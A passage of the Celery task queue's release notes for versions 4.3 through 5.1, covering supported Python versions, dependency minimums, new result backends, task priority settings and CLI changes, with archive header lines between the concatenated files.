reliable distributed system to process vast amounts of messages, while providing operations with the tools required to maintain such a system. It's a task queue with focus on real-time processing, while also supporting task scheduling. Celery has a large and diverse community of users and contributors, you should come join us :ref:`on IRC ` or :ref:`our mailing-list `. To read more about Celery you should go read the :ref:`introduction `. While this version is backward compatible with previous versions it's important that you read the following section. This version is officially supported on CPython 2.7, 3.4, 3.5, 3.6 & 3.7 and is also supported on PyPy2 & PyPy3. .. _`website`: http://celeryproject.org/ .. topic:: Table of Contents Make sure you read the important notes before upgrading to this version. .. contents:: :local: :depth: 2 Preface ======= The 4.3.0 release continues to improve our efforts to provide you with the best task execution platform for Python. This release has been codenamed `Rhubarb `_ which is one of my favorite tracks from Selected Ambient Works II. This release focuses on new features like new result backends and a revamped security serializer along with bug fixes mainly for Celery Beat, Canvas, a number of critical fixes for hanging workers and fixes for several severe memory leaks. Celery 4.3 is the first release to support Python 3.7. We hope that 4.3 will be the last release to support Python 2.7 as we now begin to work on Celery 5, the next generation of our task execution platform. However, if Celery 5 will be delayed for any reason we may release another 4.x minor version which will still support Python 2.7. If another 4.x version will be released it will most likely drop support for Python 3.4 as it will reach it's EOL in March 2019. We have also focused on reducing contribution friction. Thanks to **Josue Balandrano Coronel**, one of our core contributors, we now have an updated :ref:`contributing` document. If you intend to contribute, please review it at your earliest convenience. I have also added new issue templates, which we will continue to improve, so that the issues you open will have more relevant information which will allow us to help you to resolve them more easily. *— Omer Katz* Wall of Contributors -------------------- Alexander Ioannidis Amir Hossein Saeid Mehr Andrea Rabbaglietti Andrey Skabelin Anthony Ruhier Antonin Delpeuch Artem Vasilyev Asif Saif Uddin (Auvi) aviadatsnyk Axel Haustant Benjamin Pereto Bojan Jovanovic Brett Jackson Brett Randall Brian Schrader Bruno Alla Buddy <34044521+CoffeeExpress@users.noreply.github.com> Charles Chan Christopher Dignam Ciaran Courtney <6096029+ciarancourtney@users.noreply.github.com> Clemens Wolff Colin Watson Daniel Hahler Dash Winterson Derek Harland Dilip Vamsi Moturi <16288600+dilipvamsi@users.noreply.github.com> Dmytro Litvinov Douglas Rohde Ed Morley <501702+edmorley@users.noreply.github.com> Fabian Becker Federico Bond Fengyuan Chen Florian CHARDIN George Psarakis Guilherme Caminha ideascf Itay Jamie Alessio Jason Held Jeremy Cohen John Arnold Jon Banafato Jon Dufresne Joshua Engelman Joshua Schmid Josue Balandrano Coronel K Davis kidoz Kiyohiro Yamaguchi Korijn van Golen Lars Kruse Lars Rinn Lewis M. Kabui madprogrammer Manuel Vázquez Acosta Marcus McHale Mariatta Mario Kostelac Matt Wiens Maximilien Cuony Maximilien de Bayser Meysam Milind Shakya na387 Nicholas Pilon Nick Parsons Nik Molnar Noah Hall Noam Omer Katz Paweł Adamczak peng weikang Prathamesh Salunkhe Przemysław Suliga <1270737+suligap@users.noreply.github.com> Raf Geens (◕ᴥ◕) Robert Kopaczewski Samuel Huang Sebastian Wojciechowski <42519683+sebwoj@users.noreply.github.com> Seunghun Lee Shanavas M Simon Charette Simon Schmidt srafehi Steven Sklar Tom Booth Tom Clancy Toni Ruža tothegump Victor Mireyev Vikas Prasad walterqian Willem Xiaodong yywing <386542536@qq.com> .. note:: This wall was automatically generated from git history, so sadly it doesn't not include the people who help with more important things like answering mailing-list questions. Upgrading from Celery 4.2 ========================= Please read the important notes below as there are several breaking changes. .. _v430-important: Important Notes =============== Supported Python Versions ------------------------- The supported Python Versions are: - CPython 2.7 - CPython 3.4 - CPython 3.5 - CPython 3.6 - CPython 3.7 - PyPy2.7 6.0 (``pypy2``) - PyPy3.5 6.0 (``pypy3``) Kombu ----- Starting from this release, the minimum required version is Kombu 4.4. New Compression Algorithms ~~~~~~~~~~~~~~~~~~~~~~~~~~ Kombu 4.3 includes a few new optional compression methods: - LZMA (available from stdlib if using Python 3 or from a backported package) - Brotli (available if you install either the brotli or the brotlipy package) - ZStandard (available if you install the zstandard package) Unfortunately our current protocol generates huge payloads for complex canvases. Until we migrate to our 3rd revision of the Celery protocol in Celery 5 which will resolve this issue, please use one of the new compression methods as a workaround. See :ref:`calling-compression` for details. Billiard -------- Starting from this release, the minimum required version is Billiard 3.6. Eventlet Workers Pool --------------------- We now require `eventlet>=0.24.1`. If you are using the eventlet workers pool please install Celery using: .. code-block:: console $ pip install -U celery[eventlet] MessagePack Serializer ---------------------- We've been using the deprecated `msgpack-python` package for a while. This is now fixed as we depend on the `msgpack` instead. If you are currently using the MessagePack serializer please uninstall the previous package and reinstall the new one using: .. code-block:: console $ pip uninstall msgpack-python -y $ pip install -U celery[msgpack] MongoDB Result Backend ----------------------- We now support the `DNS seedlist connection format `_ for the MongoDB result backend. This requires the `dnspython` package. If you are using the MongoDB result backend please install Celery using: .. code-block:: console $ pip install -U celery[mongodb] Redis Message Broker -------------------- Due to multiple bugs in earlier versions of py-redis that were causing issues for Celery, we were forced to bump the minimum required version to 3.2.0. Redis Result Backend -------------------- Due to multiple bugs in earlier versions of py-redis that were causing issues for Celery, we were forced to bump the minimum required version to 3.2.0. Riak Result Backend -------------------- The official Riak client does not support Python 3.7 as of yet. In case you are using the Riak result backend, either attempt to install the client from master or avoid upgrading to Python 3.7 until this matter is resolved. In case you are using the Riak result backend with Python 3.7, we now emit a warning. Please track `basho/riak-python-client#534 `_ for updates. Dropped Support for RabbitMQ 2.x -------------------------------- Starting from this release, we officially no longer support RabbitMQ 2.x. The last release of 2.x was in 2012 and we had to make adjustments to correctly support high availability on RabbitMQ 3.x. If for some reason, you are still using RabbitMQ 2.x we encourage you to upgrade as soon as possible since security patches are no longer applied on RabbitMQ 2.x. Django Support -------------- Starting from this release, the minimum required Django version is 1.11. Revamped auth Serializer ------------------------ The auth serializer received a complete overhaul. It was previously horribly broken. We now depend on `cryptography` instead of `pyOpenSSL` for this serializer. See :ref:`message-signing` for details. .. _v430-news: News ==== Brokers ------- Redis Broker Support for SSL URIs ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The Redis broker now has support for SSL connections. You can use :setting:`broker_use_ssl` as you normally did and use a `rediss://` URI. You can also pass the SSL configuration parameters to the URI: `rediss://localhost:3456?ssl_keyfile=keyfile.key&ssl_certfile=certificate.crt&ssl_ca_certs=ca.pem&ssl_cert_reqs=CERT_REQUIRED` Configurable Events Exchange Name ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Previously, the events exchange name was hardcoded. You can use :setting:`event_exchange` to determine it. The default value remains the same. Configurable Pidbox Exchange Name ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Previously, the Pidbox exchange name was hardcoded. You can use :setting:`control_exchange` to determine it. The default value remains the same. Result Backends --------------- Redis Result Backend Support for SSL URIs ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The Redis result backend now has support for SSL connections. You can use :setting:`redis_backend_use_ssl` to configure it and use a `rediss://` URI. You can also pass the SSL configuration parameters to the URI: `rediss://localhost:3456?ssl_keyfile=keyfile.key&ssl_certfile=certificate.crt&ssl_ca_certs=ca.pem&ssl_cert_reqs=CERT_REQUIRED` Store Extended Task Metadata in Result ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ When :setting:`result_extended` is `True` the backend will store the following metadata: - Task Name - Arguments - Keyword arguments - The worker the task was executed on - Number of retries - The queue's name or routing key In addition, :meth:`celery.app.task.update_state` now accepts keyword arguments which allows you to store custom data with the result. Encode Results Using A Different Serializer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The :setting:`result_accept_content` setting allows to configure different accepted content for the result backend. A special serializer (`auth`) is used for signed messaging, however the result_serializer remains in json, because we don't want encrypted content in our result backend. To accept unsigned content from the result backend, we introduced this new configuration option to specify the accepted content from the backend. New Result Backends ~~~~~~~~~~~~~~~~~~~ This release introduces four new result backends: - S3 result backend - ArangoDB result backend - Azure Block Blob Storage result backend - CosmosDB result backend S3 Result Backend ~~~~~~~~~~~~~~~~~ Amazon Simple Storage Service (Amazon S3) is an object storage service by AWS. The results are stored using the following path template: | <:setting:`s3_bucket`>/<:setting:`s3_base_path`>/ See :ref:`conf-s3-result-backend` for more information. ArangoDB Result Backend ~~~~~~~~~~~~~~~~~~~~~~~ ArangoDB is a native multi-model database with search capabilities. The backend stores the result in the following document format: | { | _key: {key}, | task: {task} | } See :ref:`conf-arangodb-result-backend` for more information. Azure Block Blob Storage Result Backend ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Azure Block Blob Storage is an object storage service by Microsoft. The backend stores the result in the following path template: | <:setting:`azureblockblob_container_name`>/ See :ref:`conf-azureblockblob-result-backend` for more information. CosmosDB Result Backend ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Azure Cosmos DB is Microsoft's globally distributed, multi-model database service. The backend stores the result in the following document format: | { | id: {key}, | value: {task} | } See :ref:`conf-cosmosdbsql-result-backend` for more information. Tasks ----- Cythonized Tasks ~~~~~~~~~~~~~~~~ Cythonized tasks are now supported. You can generate C code from Cython that specifies a task using the `@task` decorator and everything should work exactly the same. Acknowledging Tasks on Failures or Timeouts ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ When :setting:`task_acks_late` is set to `True` tasks are acknowledged on failures or timeouts. This makes it hard to use dead letter queues and exchanges. Celery 4.3 introduces the new :setting:`task_acks_on_failure_or_timeout` which allows you to avoid acknowledging tasks if they failed or timed out even if :setting:`task_acks_late` is set to `True`. :setting:`task_acks_on_failure_or_timeout` is set to `True` by default. Schedules Now Support Microseconds ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ When scheduling tasks using :program:`celery beat` microseconds are no longer ignored. Default Task Priority ~~~~~~~~~~~~~~~~~~~~~ You can now set the default priority of a task using the :setting:`task_default_priority` setting. The setting's value will be used if no priority is provided for a specific task. Tasks Optionally Inherit Parent's Priority ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Setting the :setting:`task_inherit_parent_priority` configuration option to `True` will make Celery tasks inherit the priority of the previous task linked to it. Examples: .. code-block:: python c = celery.chain( add.s(2), # priority=None add.s(3).set(priority=5), # priority=5 add.s(4), # priority=5 add.s(5).set(priority=3), # priority=3 add.s(6), # priority=3 ) .. code-block:: python @app.task(bind=True) def child_task(self): pass @app.task(bind=True) def parent_task(self): child_task.delay() # child_task will also have priority=5 parent_task.apply_async(args=[], priority=5) Canvas ------ Chords can be Executed in Eager Mode ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ When :setting:`task_always_eager` is set to `True`, chords are executed eagerly as well. Configurable Chord Join Timeout ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Previously, :meth:`celery.result.GroupResult.join` had a fixed timeout of 3 seconds. The :setting:`result_chord_join_timeout` setting now allows you to change it. The default remains 3 seconds. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/docs/history/whatsnew-4.4.rst0000664000175000017500000001552700000000000020235 0ustar00asifasif00000000000000.. _whatsnew-4.4: ================================== What's new in Celery 4.4 (Cliffs) ================================== :Author: Asif Saif Uddin (``auvipy at gmail.com``) .. sidebar:: Change history What's new documents describe the changes in major versions, we also have a :ref:`changelog` that lists the changes in bugfix releases (0.0.x), while older series are archived under the :ref:`history` section. Celery is a simple, flexible, and reliable distributed programming framework to process vast amounts of messages, while providing operations with the tools required to maintain a distributed system with python. It's a task queue with focus on real-time processing, while also supporting task scheduling. Celery has a large and diverse community of users and contributors, you should come join us :ref:`on IRC ` or :ref:`our mailing-list `. To read more about Celery you should go read the :ref:`introduction `. While this version is backward compatible with previous versions it's important that you read the following section. This version is officially supported on CPython 2.7, 3.5, 3.6, 3.7 & 3.8 and is also supported on PyPy2 & PyPy3. .. _`website`: http://celeryproject.org/ .. topic:: Table of Contents Make sure you read the important notes before upgrading to this version. .. contents:: :local: :depth: 2 Preface ======= The 4.4.0 release continues to improve our efforts to provide you with the best task execution platform for Python. This release has been codenamed `Cliffs `_ which is one of my favorite tracks. This release focuses on mostly bug fixes and usability improvement for developers. Many long standing bugs, usability issues, documentation issues & minor enhancement issues were squashed which improve the overall developers experience. Celery 4.4 is the first release to support Python 3.8 & pypy36-7.2. As we now begin to work on Celery 5, the next generation of our task execution platform, at least another 4.x is expected before Celery 5 stable release & will get support for at least 1 years depending on community demand and support. We have also focused on reducing contribution friction and updated the contributing tools. *— Asif Saif Uddin* Wall of Contributors -------------------- .. note:: This wall was automatically generated from git history, so sadly it doesn't not include the people who help with more important things like answering mailing-list questions. Upgrading from Celery 4.3 ========================= Please read the important notes below as there are several breaking changes. .. _v440-important: Important Notes =============== Supported Python Versions ------------------------- The supported Python Versions are: - CPython 2.7 - CPython 3.5 - CPython 3.6 - CPython 3.7 - CPython 3.8 - PyPy2.7 7.2 (``pypy2``) - PyPy3.5 7.1 (``pypy3``) - PyPy3.6 7.2 (``pypy3``) Dropped support for Python 3.4 ------------------------------ Celery now requires either Python 2.7 or Python 3.5 and above. Python 3.4 has reached EOL in March 2019. In order to focus our efforts we have dropped support for Python 3.4 in this version. If you still require to run Celery using Python 3.4 you can still use Celery 4.3. However we encourage you to upgrade to a supported Python version since no further security patches will be applied for Python 3.4. Kombu ----- Starting from this release, the minimum required version is Kombu 4.6.6. Billiard -------- Starting from this release, the minimum required version is Billiard 3.6.1. Redis Message Broker -------------------- Due to multiple bugs in earlier versions of redis-py that were causing issues for Celery, we were forced to bump the minimum required version to 3.3.0. Redis Result Backend -------------------- Due to multiple bugs in earlier versions of redis-py that were causing issues for Celery, we were forced to bump the minimum required version to 3.3.0. DynamoDB Result Backend ----------------------- The DynamoDB result backend has gained TTL support. As a result the minimum boto3 version was bumped to 1.9.178 which is the first version to support TTL for DynamoDB. S3 Results Backend ------------------ To keep up with the current AWS API changes the minimum boto3 version was bumped to 1.9.125. SQS Message Broker ------------------ To keep up with the current AWS API changes the minimum boto3 version was bumped to 1.9.125. Configuration -------------- `CELERY_TASK_RESULT_EXPIRES` has been replaced with `CELERY_RESULT_EXPIRES`. .. _v440-news: News ==== Task Pools ---------- Threaded Tasks Pool ~~~~~~~~~~~~~~~~~~~ We reintroduced a threaded task pool using `concurrent.futures.ThreadPoolExecutor`. The previous threaded task pool was experimental. In addition it was based on the `threadpool `_ package which is obsolete. You can use the new threaded task pool by setting :setting:`worker_pool` to 'threads` or by passing `--pool threads` to the `celery worker` command. Result Backends --------------- ElasticSearch Results Backend ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HTTP Basic Authentication Support +++++++++++++++++++++++++++++++++ You can now use HTTP Basic Authentication when using the ElasticSearch result backend by providing the username and the password in the URI. Previously, they were ignored and only unauthenticated requests were issued. MongoDB Results Backend ~~~~~~~~~~~~~~~~~~~~~~~ Support for Authentication Source and Authentication Method +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ You can now specify the authSource and authMethod for the MongoDB using the URI options. The following URI does just that: ``mongodb://user:password@example.com/?authSource=the_database&authMechanism=SCRAM-SHA-256`` Refer to the `documentation `_ for details about the various options. Tasks ------ Task class definitions can now have retry attributes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ You can now use `autoretry_for`, `retry_kwargs`, `retry_backoff`, `retry_backoff_max` and `retry_jitter` in class-based tasks: .. code-block:: python class BaseTaskWithRetry(Task): autoretry_for = (TypeError,) retry_kwargs = {'max_retries': 5} retry_backoff = True retry_backoff_max = 700 retry_jitter = False Canvas ------ Replacing Tasks Eagerly ~~~~~~~~~~~~~~~~~~~~~~~ You can now call `self.replace()` on tasks which are run eagerly. They will work exactly the same as tasks which are run asynchronously. Chaining Groups ~~~~~~~~~~~~~~~ Chaining groups no longer result in a single group. The following used to join the two groups into one. Now they correctly execute one after another:: >>> result = group(add.si(1, 2), add.si(1, 2)) | group(tsum.s(), tsum.s()).delay() >>> result.get() [6, 6] ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/history/whatsnew-5.0.rst0000664000175000017500000002531500000000000020226 0ustar00asifasif00000000000000.. _whatsnew-5.0: ======================================= What's new in Celery 5.0 (singularity) ======================================= :Author: Omer Katz (``omer.drow at gmail.com``) .. sidebar:: Change history What's new documents describe the changes in major versions, we also have a :ref:`changelog` that lists the changes in bugfix releases (0.0.x), while older series are archived under the :ref:`history` section. Celery is a simple, flexible, and reliable distributed programming framework to process vast amounts of messages, while providing operations with the tools required to maintain a distributed system with python. It's a task queue with focus on real-time processing, while also supporting task scheduling. Celery has a large and diverse community of users and contributors, you should come join us :ref:`on IRC ` or :ref:`our mailing-list `. To read more about Celery you should go read the :ref:`introduction `. While this version is **mostly** backward compatible with previous versions it's important that you read the following section as this release is a new major version. This version is officially supported on CPython 3.6, 3.7 & 3.8 and is also supported on PyPy3. .. _`website`: http://celeryproject.org/ .. topic:: Table of Contents Make sure you read the important notes before upgrading to this version. .. contents:: :local: :depth: 2 Preface ======= The 5.0.0 release is a new major release for Celery. Starting from now users should expect more frequent releases of major versions as we move fast and break things to bring you even better experience. Releases in the 5.x series are codenamed after songs of `Jon Hopkins `_. This release has been codenamed `Singularity `_. This version drops support for Python 2.7.x which has reached EOL in January 1st, 2020. This allows us, the maintainers to focus on innovating without worrying for backwards compatibility. From now on we only support Python 3.6 and above. We will maintain compatibility with Python 3.6 until it's EOL in December, 2021. *— Omer Katz* Long Term Support Policy ------------------------ As we'd like to provide some time for you to transition, we're designating Celery 4.x an LTS release. Celery 4.x will be supported until the 1st of August, 2021. We will accept and apply patches for bug fixes and security issues. However, no new features will be merged for that version. Celery 5.x **is not** an LTS release. We will support it until the release of Celery 6.x. We're in the process of defining our Long Term Support policy. Watch the next "What's New" document for updates. Wall of Contributors -------------------- Artem Vasilyev Ash Berlin-Taylor Asif Saif Uddin (Auvi) Asif Saif Uddin Christian Clauss Germain Chazot Harry Moreno kevinbai Martin Paulus Matus Valo Matus Valo maybe-sybr <58414429+maybe-sybr@users.noreply.github.com> Omer Katz Patrick Cloke qiaocc Thomas Grainger Weiliang Li .. note:: This wall was automatically generated from git history, so sadly it doesn't not include the people who help with more important things like answering mailing-list questions. Upgrading from Celery 4.x ========================= Step 1: Adjust your command line invocation ------------------------------------------- Celery 5.0 introduces a new CLI implementation which isn't completely backwards compatible. The global options can no longer be positioned after the sub-command. Instead, they must be positioned as an option for the `celery` command like so:: celery --app path.to.app worker If you were using our :ref:`daemonizing` guide to deploy Celery in production, you should revisit it for updates. Step 2: Update your configuration with the new setting names ------------------------------------------------------------ If you haven't already updated your configuration when you migrated to Celery 4.0, please do so now. We elected to extend the deprecation period until 6.0 since we did not loudly warn about using these deprecated settings. Please refer to the :ref:`migration guide ` for instructions. Step 3: Read the important notes in this document ------------------------------------------------- Make sure you are not affected by any of the important upgrade notes mentioned in the :ref:`following section `. You should mainly verify that any of the breaking changes in the CLI do not affect you. Please refer to :ref:`New Command Line Interface ` for details. Step 4: Migrate your code to Python 3 ------------------------------------- Celery 5.0 supports only Python 3. Therefore, you must ensure your code is compatible with Python 3. If you haven't ported your code to Python 3, you must do so before upgrading. You can use tools like `2to3 `_ and `pyupgrade `_ to assist you with this effort. After the migration is done, run your test suite with Celery 4 to ensure nothing has been broken. Step 5: Upgrade to Celery 5.0 ----------------------------- At this point you can upgrade your workers and clients with the new version. .. _v500-important: Important Notes =============== Supported Python Versions ------------------------- The supported Python Versions are: - CPython 3.6 - CPython 3.7 - CPython 3.8 - PyPy3.6 7.2 (``pypy3``) Dropped support for Python 2.7 & 3.5 ------------------------------------ Celery now requires Python 3.6 and above. Python 2.7 has reached EOL in January 2020. In order to focus our efforts we have dropped support for Python 2.7 in this version. In addition, Python 3.5 has reached EOL in September 2020. Therefore, we are also dropping support for Python 3.5. If you still require to run Celery using Python 2.7 or Python 3.5 you can still use Celery 4.x. However we encourage you to upgrade to a supported Python version since no further security patches will be applied for Python 2.7 and as mentioned Python 3.5 is not supported for practical reasons. Kombu ----- Starting from this release, the minimum required version is Kombu 5.0.0. Billiard -------- Starting from this release, the minimum required version is Billiard 3.6.3. Eventlet Workers Pool --------------------- Due to `eventlet/eventlet#526 `_ the minimum required version is eventlet 0.26.1. Gevent Workers Pool ------------------- Starting from this release, the minimum required version is gevent 1.0.0. Couchbase Result Backend ------------------------ The Couchbase result backend now uses the V3 Couchbase SDK. As a result, we no longer support Couchbase Server 5.x. Also, starting from this release, the minimum required version for the database client is couchbase 3.0.0. To verify that your Couchbase Server is compatible with the V3 SDK, please refer to their `documentation `_. Riak Result Backend ------------------- The Riak result backend has been removed as the database is no longer maintained. The Python client only supports Python 3.6 and below which prevents us from supporting it and it is also unmaintained. If you are still using Riak, refrain from upgrading to Celery 5.0 while you migrate your application to a different database. We apologize for the lack of notice in advance but we feel that the chance you'll be affected by this breaking change is minimal which is why we did it. AMQP Result Backend ------------------- The AMQP result backend has been removed as it was deprecated in version 4.0. Removed Deprecated Modules -------------------------- The `celery.utils.encoding` and the `celery.task` modules has been deprecated in version 4.0 and therefore are removed in 5.0. If you were using the `celery.utils.encoding` module before, you should import `kombu.utils.encoding` instead. If you were using the `celery.task` module before, you should import directly from the `celery` module instead. If you were using `from celery.task import Task` you should use `from celery import Task` instead. If you were using the `celery.task` decorator you should use `celery.shared_task` instead. .. _new_command_line_interface: New Command Line Interface -------------------------- The command line interface has been revamped using Click. As a result a few breaking changes has been introduced: - Postfix global options like `celery worker --app path.to.app` or `celery worker --workdir /path/to/workdir` are no longer supported. You should specify them as part of the global options of the main celery command. - :program:`celery amqp` and :program:`celery shell` require the `repl` sub command to start a shell. You can now also invoke specific commands without a shell. Type `celery amqp --help` or `celery shell --help` for details. - The API for adding user options has changed. Refer to the :ref:`documentation ` for details. Click provides shell completion `out of the box `_. This functionality replaces our previous bash completion script and adds completion support for the zsh and fish shells. The bash completion script was exported to `extras/celery.bash `_ for the packager's convenience. Pytest Integration ------------------ Starting from Celery 5.0, the pytest plugin is no longer enabled by default. Please refer to the :ref:`documentation ` for instructions. Ordered Group Results for the Redis Result Backend -------------------------------------------------- Previously group results were not ordered by their invocation order. Celery 4.4.7 introduced an opt-in feature to make them ordered. It is now an opt-out behavior. If you were previously using the Redis result backend, you might need to opt-out of this behavior. Please refer to the :ref:`documentation ` for instructions on how to disable this feature. .. _v500-news: News ==== Retry Policy for the Redis Result Backend ----------------------------------------- The retry policy for the Redis result backend is now exposed through the result backend transport options. Please refer to the :ref:`documentation ` for details. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/docs/history/whatsnew-5.1.rst0000664000175000017500000003230100000000000020220 0ustar00asifasif00000000000000.. _whatsnew-5.1: ========================================= What's new in Celery 5.1 (Sun Harmonics) ========================================= :Author: Josue Balandrano Coronel (``jbc at rmcomplexity.com``) .. sidebar:: Change history What's new documents describe the changes in major versions, we also have a :ref:`changelog` that lists the changes in bugfix releases (0.0.x), while older series are archived under the :ref:`history` section. Celery is a simple, flexible, and reliable distributed programming framework to process vast amounts of messages, while providing operations with the tools required to maintain a distributed system with python. It's a task queue with focus on real-time processing, while also supporting task scheduling. Celery has a large and diverse community of users and contributors, you should come join us :ref:`on IRC ` or :ref:`our mailing-list `. To read more about Celery you should go read the :ref:`introduction `. While this version is **mostly** backward compatible with previous versions it's important that you read the following section as this release is a new major version. This version is officially supported on CPython 3.6, 3.7 & 3.8 & 3.9 and is also supported on PyPy3. .. _`website`: http://celeryproject.org/ .. topic:: Table of Contents Make sure you read the important notes before upgrading to this version. .. contents:: :local: :depth: 2 Preface ======= The 5.1.0 release is a new minor release for Celery. Starting from now users should expect more frequent releases of major versions as we move fast and break things to bring you even better experience. Releases in the 5.x series are codenamed after songs of `Jon Hopkins `_. This release has been codenamed `Sun Harmonics `_. From now on we only support Python 3.6 and above. We will maintain compatibility with Python 3.6 until it's EOL in December, 2021. *— Omer Katz* Long Term Support Policy ------------------------ As we'd like to provide some time for you to transition, we're designating Celery 4.x an LTS release. Celery 4.x will be supported until the 1st of August, 2021. We will accept and apply patches for bug fixes and security issues. However, no new features will be merged for that version. Celery 5.x **is not** an LTS release. We will support it until the release of Celery 6.x. We're in the process of defining our Long Term Support policy. Watch the next "What's New" document for updates. Wall of Contributors -------------------- 0xflotus <0xflotus@gmail.com> AbdealiJK Anatoliy Anna Borzenko aruseni Asif Saif Uddin (Auvi) Asif Saif Uddin Awais Qureshi careljonkhout Christian Clauss danthegoodman1 Dave Johansen David Schneider Fahmi Felix Yan Gabriel Augendre galcohen gal cohen Geunsik Lim Guillaume DE SUSANNE D'EPINAY Hilmar Hilmarsson Illia Volochii jenhaoyang Jonathan Stoppani Josue Balandrano Coronel kosarchuksn Kostya Deev Matt Hoffman Matus Valo Myeongseok Seo Noam Omer Katz pavlos kallis Pavol Plaskoň Pengjie Song (宋鹏捷) Sardorbek Imomaliev Sergey Lyapustin Sergey Tikhonov Stephen J. Fuhry Swen Kooij tned73 Tomas Hrnciar tumb1er .. note:: This wall was automatically generated from git history, so sadly it doesn't not include the people who help with more important things like answering mailing-list questions. Upgrading from Celery 4.x ========================= Step 1: Adjust your command line invocation ------------------------------------------- Celery 5.0 introduces a new CLI implementation which isn't completely backwards compatible. The global options can no longer be positioned after the sub-command. Instead, they must be positioned as an option for the `celery` command like so:: celery --app path.to.app worker If you were using our :ref:`daemonizing` guide to deploy Celery in production, you should revisit it for updates. Step 2: Update your configuration with the new setting names ------------------------------------------------------------ If you haven't already updated your configuration when you migrated to Celery 4.0, please do so now. We elected to extend the deprecation period until 6.0 since we did not loudly warn about using these deprecated settings. Please refer to the :ref:`migration guide ` for instructions. Step 3: Read the important notes in this document ------------------------------------------------- Make sure you are not affected by any of the important upgrade notes mentioned in the :ref:`following section `. You should verify that none of the breaking changes in the CLI do not affect you. Please refer to :ref:`New Command Line Interface ` for details. Step 4: Migrate your code to Python 3 ------------------------------------- Celery 5.x only supports Python 3. Therefore, you must ensure your code is compatible with Python 3. If you haven't ported your code to Python 3, you must do so before upgrading. You can use tools like `2to3 `_ and `pyupgrade `_ to assist you with this effort. After the migration is done, run your test suite with Celery 4 to ensure nothing has been broken. Step 5: Upgrade to Celery 5.1 ----------------------------- At this point you can upgrade your workers and clients with the new version. .. _v510-important: Important Notes =============== Supported Python Versions ------------------------- The supported Python Versions are: - CPython 3.6 - CPython 3.7 - CPython 3.8 - CPython 3.9 - PyPy3.6 7.2 (``pypy3``) Important Notes --------------- Kombu ~~~~~ Starting from v5.1, the minimum required version is Kombu 5.1.0. Billiard ~~~~~~~~ Starting from v5.1, the minimum required version is Billiard 3.6.4. Important Notes From 5.0 ------------------------ Dropped support for Python 2.7 & 3.5 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Celery now requires Python 3.6 and above. Python 2.7 has reached EOL in January 2020. In order to focus our efforts we have dropped support for Python 2.7 in this version. In addition, Python 3.5 has reached EOL in September 2020. Therefore, we are also dropping support for Python 3.5. If you still require to run Celery using Python 2.7 or Python 3.5 you can still use Celery 4.x. However we encourage you to upgrade to a supported Python version since no further security patches will be applied for Python 2.7 or Python 3.5. Eventlet Workers Pool ~~~~~~~~~~~~~~~~~~~~~ Due to `eventlet/eventlet#526 `_ the minimum required version is eventlet 0.26.1. Gevent Workers Pool ~~~~~~~~~~~~~~~~~~~ Starting from v5.0, the minimum required version is gevent 1.0.0. Couchbase Result Backend ~~~~~~~~~~~~~~~~~~~~~~~~ The Couchbase result backend now uses the V3 Couchbase SDK. As a result, we no longer support Couchbase Server 5.x. Also, starting from v5.0, the minimum required version for the database client is couchbase 3.0.0. To verify that your Couchbase Server is compatible with the V3 SDK, please refer to their `documentation `_. Riak Result Backend ~~~~~~~~~~~~~~~~~~~ The Riak result backend has been removed as the database is no longer maintained. The Python client only supports Python 3.6 and below which prevents us from supporting it and it is also unmaintained. If you are still using Riak, refrain from upgrading to Celery 5.0 while you migrate your application to a different database. We apologize for the lack of notice in advance but we feel that the chance you'll be affected by this breaking change is minimal which is why we did it. AMQP Result Backend ~~~~~~~~~~~~~~~~~~~ The AMQP result backend has been removed as it was deprecated in version 4.0. Removed Deprecated Modules ~~~~~~~~~~~~~~~~~~~~~~~~~~ The `celery.utils.encoding` and the `celery.task` modules has been deprecated in version 4.0 and therefore are removed in 5.0. If you were using the `celery.utils.encoding` module before, you should import `kombu.utils.encoding` instead. If you were using the `celery.task` module before, you should import directly from the `celery` module instead. If you were using `from celery.task import Task` you should use `from celery import Task` instead. If you were using the `celery.task` decorator you should use `celery.shared_task` instead. `azure-servicebus` 7.0.0 is now required ---------------------------------------- Given the SDK changes between 0.50.0 and 7.0.0 Kombu deprecates support for older `azure-servicebus` versions. .. _v510-news: News ==== Support for Azure Service Bus 7.0.0 ----------------------------------- With Kombu v5.1.0 we now support Azure Services Bus. Azure have completely changed the Azure ServiceBus SDK between 0.50.0 and 7.0.0. `azure-servicebus >= 7.0.0` is now required for Kombu `5.1.0` Add support for SQLAlchemy 1.4 ------------------------------ Following the changes in SQLAlchemy 1.4, the declarative base is no longer an extension. Importing it from sqlalchemy.ext.declarative is deprecated and will be removed in SQLAlchemy 2.0. Support for Redis username authentication ----------------------------------------- Previously, the username was ignored from the URI. Starting from Redis>=6.0, that shouldn't be the case since ACL support has landed. Please refer to the :ref:`documentation <_conf-redis-result-backend>` for details. SQS transport - support back off policy ---------------------------------------- SQS now supports managed visibility timeout. This lets us implement a back off policy (for instance, an exponential policy) which means that the time between task failures will dynamically change based on the number of retries. Documentation: :doc:`reference/kombu.transport.SQS.rst` Duplicate successful tasks --------------------------- The trace function fetches the metadata from the backend each time it receives a task and compares its state. If the state is 